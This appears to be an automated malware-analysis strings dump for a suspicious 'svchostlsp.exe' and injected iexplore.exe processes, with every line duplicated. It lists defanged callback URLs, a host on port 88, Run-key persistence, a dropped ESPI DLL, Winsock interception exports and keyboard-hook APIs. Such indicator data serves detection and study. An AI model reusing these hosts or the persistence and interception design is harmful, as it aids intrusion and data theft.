zcÁ
zcÁ
right-curly-bracket
right-curly-bracket
left-curly-bracket
left-curly-bracket
0123456789
0123456789
hXXp://VVV.92117my.com/host.htmly
hXXp://VVV.92117my.com/host.htmly
C:\Windows\svchosl.exe
C:\Windows\svchosl.exe
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
..a.OO
..a.OO
PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
(*.*)
(*.*)
1.0.0.0
1.0.0.0
svchostlsp.exe_3736:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
t$(SSh
t$(SSh
~%UVW
~%UVW
^}•0DN
^}•0DN
u$SShe
u$SShe
kernel32.dll
kernel32.dll
user32.dll
user32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xff
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xff
C:\Windows\twain_32\config\ESPI11.dll
C:\Windows\twain_32\config\ESPI11.dll
C:\Windows\twain_32\config
C:\Windows\twain_32\config
.inidata
.inidata
@.reloc
@.reloc
CNotSupportedException
CNotSupportedException
CCmdTarget
CCmdTarget
commctrl_DragListMsg
commctrl_DragListMsg
COMCTL32.DLL
COMCTL32.DLL
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
WS2_32.dll
WS2_32.dll
COMCTL32.dll
COMCTL32.dll
GetCPInfo
GetCPInfo
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
GetKeyState
GetKeyState
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GDI32.dll
GDI32.dll
WINSPOOL.DRV
WINSPOOL.DRV
comdlg32.dll
comdlg32.dll
SHELL32.dll
SHELL32.dll
SWNPM.dll
SWNPM.dll
.PAVCException@@
.PAVCException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
>$>(>,>0>4>8>@>
>$>(>,>0>4>8>@>
0F0g0m0
0F0g0m0
9$9(9,90989
9$9(9,90989
%System%\addressoftext.inscan
%System%\addressoftext.inscan
hXXp://20140507.ip138.com/ic.asp
hXXp://20140507.ip138.com/ic.asp
z>Windows 2000
z>Windows 2000
@Windows XP
@Windows XP
@Windows Server 2003
@Windows Server 2003
@Windows Vista
@Windows Vista
@Windows 7
@Windows 7
@Windows 8
@Windows 8
@127.0.0.1
@127.0.0.1
hXXp://VVV.gxnkw.com/jc/tongji.txt
hXXp://VVV.gxnkw.com/jc/tongji.txt
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
%*.*f
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
RASAPI32.dll
RASAPI32.dll
GetProcessHeap
GetProcessHeap
WinExec
WinExec
GetViewportOrgEx
GetViewportOrgEx
WINMM.dll
WINMM.dll
RegCreateKeyA
RegCreateKeyA
RegDeleteKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCreateKeyExA
RegEnumKeyA
RegEnumKeyA
RegOpenKeyA
RegOpenKeyA
ShellExecuteA
ShellExecuteA
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
WININET.dll
WININET.dll
CreateDialogIndirectParamA
CreateDialogIndirectParamA
GetViewportExtEx
GetViewportExtEx
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
.PAVCFileException@@
.PAVCFileException@@
: %d]
: %d]
(*.*)|*.*||
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
out.prn
out.prn
(*.prn)|*.prn|
(*.prn)|*.prn|
%d.%d
%d.%d
%d/%d
%d/%d
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
%d / %d
%d / %d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
%s\ESPI%d.dll
%s\ESPI%d.dll
hXXp://dywt.com.cn
hXXp://dywt.com.cn
service@dywt.com.cn
service@dywt.com.cn
86(0411)88995834
86(0411)88995834
86(0411)88995831
86(0411)88995831
Windows
Windows
(ESPINN.dll(NN
(ESPINN.dll(NN
This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit VVV.dywt.com.cn/info
This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit VVV.dywt.com.cn/info
CallerInfoCopyCmd
CallerInfoCopyCmd
SetIPPort
SetIPPort
GetIPPort
GetIPPort
"C:\Windows\System32\ESPI11.dll"
"C:\Windows\System32\ESPI11.dll"
ProviderInstallCopyCmd
ProviderInstallCopyCmd
SockDataCopyCmd
SockDataCopyCmd
SockAddrCopyCmd
SockAddrCopyCmd
enetintercept_fnSockAddrSetIPPort
enetintercept_fnSockAddrSetIPPort
enetintercept_fnSockAddrGetIPPort
enetintercept_fnSockAddrGetIPPort
enetintercept_fnInstallCopyCmd
enetintercept_fnInstallCopyCmd
enetintercept_fnSockDataCopyCmd
enetintercept_fnSockDataCopyCmd
enetintercept_fnSockAddrCopyCmd
enetintercept_fnSockAddrCopyCmd
enetintercept_fnCallerInfoCopyCmd
enetintercept_fnCallerInfoCopyCmd
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
HTTP/1.0
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
zcÁ
zcÁ
18201869647.com:88
18201869647.com:88
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\svchostlsp.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\svchostlsp.exe
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
555455###
555455###
1, 1, 0, 0
1, 1, 0, 0
ESPI11.dll
ESPI11.dll
(*.*)
(*.*)
1.0.0.0
1.0.0.0
iexplore.exe_1924:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
>.uzf
>.uzf
.us;}
.us;}
IEFRAME.dll
IEFRAME.dll
MLANG.dll
MLANG.dll
iertutil.dll
iertutil.dll
urlmon.dll
urlmon.dll
ole32.dll
ole32.dll
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
KERNEL32.dll
KERNEL32.dll
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
GetWindowsDirectoryW
GetWindowsDirectoryW
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
UrlApplySchemeW
UrlApplySchemeW
PathIsURLW
PathIsURLW
UrlCanonicalizeW
UrlCanonicalizeW
UrlCreateFromPathW
UrlCreateFromPathW
iexplore.pdb
iexplore.pdb
KEYW
KEYW
KEYWh
KEYWh
KEYWD
KEYWD
.ENNNG.
.ENNNG.
a.ry.v
a.ry.v
l.igM4
l.igM4
?1%SGf
?1%SGf
xh.JW^
xh.JW^
.97777"7" " " !
.97777"7" " " !
3.... ))
3.... ))
8888888888888
8888888888888
8888888888
8888888888
.lPV)
.lPV)
úW1
úW1
.ApX/
.ApX/
H.ZAf
H.ZAf
ð[U
ð[U
%s!FK
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
888777777
Y.hilkRROMLK=C,
Y.hilkRROMLK=C,
..(((($$
..(((($$
3...((((%
3...((((%
3....(.''$
3....(.''$
3.2...((((%
3.2...((((%
33.2....(,'
33.2....(,'
55323222...
55323222...
(%&'00443445?
(%&'00443445?
00.,,,4(
00.,,,4(
000.,,9(
000.,,9(
0020..9(
0020..9(
003200;(
003200;(
(#'( (''''!'!
(#'( (''''!'!
Microsoft.InternetExplorer.Default
Microsoft.InternetExplorer.Default
6user32.dll
6user32.dll
Kernel32.DLL
Kernel32.DLL
6xfire.exe
6xfire.exe
wlmail.exe
wlmail.exe
winamp.exe
winamp.exe
waol.exe
waol.exe
sidebar.exe
sidebar.exe
psocdesigner.exe
psocdesigner.exe
np.exe
np.exe
netscape.exe
netscape.exe
netcaptor.exe
netcaptor.exe
neoplanet.exe
neoplanet.exe
msn.exe
msn.exe
mshtmpad.exe
mshtmpad.exe
mshta.exe
mshta.exe
loader42.exe
loader42.exe
infopath.exe
infopath.exe
iexplore.exe
iexplore.exe
iepreview.exe
iepreview.exe
groove.exe
groove.exe
explorer.exe
explorer.exe
dreamweaver.exe
dreamweaver.exe
contribute.exe
contribute.exe
aol.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
"%s" %s
Kernel32.dll
Kernel32.dll
\AppPatch\sysmain.sdb
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
kernel32.dll
{00000000-0000-0000-0000-000000000000}
{00000000-0000-0000-0000-000000000000}
\\?\Volume
\\?\Volume
shell:%s
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Frame_URLEntered
Imaging_CreateWebPagePreview
Imaging_CreateWebPagePreview
WS_ExecuteQuery
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
IEXPLORE.EXE
Windows
Windows
9.00.8112.16421
9.00.8112.16421
iexplore.exe_1548:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
>.uzf
>.uzf
.us;}
.us;}
IEFRAME.dll
IEFRAME.dll
MLANG.dll
MLANG.dll
iertutil.dll
iertutil.dll
urlmon.dll
urlmon.dll
ole32.dll
ole32.dll
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
KERNEL32.dll
KERNEL32.dll
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
GetWindowsDirectoryW
GetWindowsDirectoryW
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
UrlApplySchemeW
UrlApplySchemeW
PathIsURLW
PathIsURLW
UrlCanonicalizeW
UrlCanonicalizeW
UrlCreateFromPathW
UrlCreateFromPathW
iexplore.pdb
iexplore.pdb
KEYW
KEYW
KEYWh
KEYWh
KEYWD
KEYWD
.ENNNG.
.ENNNG.
a.ry.v
a.ry.v
l.igM4
l.igM4
?1%SGf
?1%SGf
xh.JW^
xh.JW^
.97777"7" " " !
.97777"7" " " !
3.... ))
3.... ))
8888888888888
8888888888888
8888888888
8888888888
.lPV)
.lPV)
úW1
úW1
.ApX/
.ApX/
H.ZAf
H.ZAf
ð[U
ð[U
%s!FK
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
888777777
Y.hilkRROMLK=C,
Y.hilkRROMLK=C,
..(((($$
..(((($$
3...((((%
3...((((%
3....(.''$
3....(.''$
3.2...((((%
3.2...((((%
33.2....(,'
33.2....(,'
55323222...
55323222...
(%&'00443445?
(%&'00443445?
00.,,,4(
00.,,,4(
000.,,9(
000.,,9(
0020..9(
0020..9(
003200;(
003200;(
(#'( (''''!'!
(#'( (''''!'!
Microsoft.InternetExplorer.Default
Microsoft.InternetExplorer.Default
6user32.dll
6user32.dll
Kernel32.DLL
Kernel32.DLL
6xfire.exe
6xfire.exe
wlmail.exe
wlmail.exe
winamp.exe
winamp.exe
waol.exe
waol.exe
sidebar.exe
sidebar.exe
psocdesigner.exe
psocdesigner.exe
np.exe
np.exe
netscape.exe
netscape.exe
netcaptor.exe
netcaptor.exe
neoplanet.exe
neoplanet.exe
msn.exe
msn.exe
mshtmpad.exe
mshtmpad.exe
mshta.exe
mshta.exe
loader42.exe
loader42.exe
infopath.exe
infopath.exe
iexplore.exe
iexplore.exe
iepreview.exe
iepreview.exe
groove.exe
groove.exe
explorer.exe
explorer.exe
dreamweaver.exe
dreamweaver.exe
contribute.exe
contribute.exe
aol.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
"%s" %s
Kernel32.dll
Kernel32.dll
\AppPatch\sysmain.sdb
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
kernel32.dll
{00000000-0000-0000-0000-000000000000}
{00000000-0000-0000-0000-000000000000}
\\?\Volume
\\?\Volume
shell:%s
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Frame_URLEntered
Imaging_CreateWebPagePreview
Imaging_CreateWebPagePreview
WS_ExecuteQuery
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
IEXPLORE.EXE
Windows
Windows
9.00.8112.16421
9.00.8112.16421
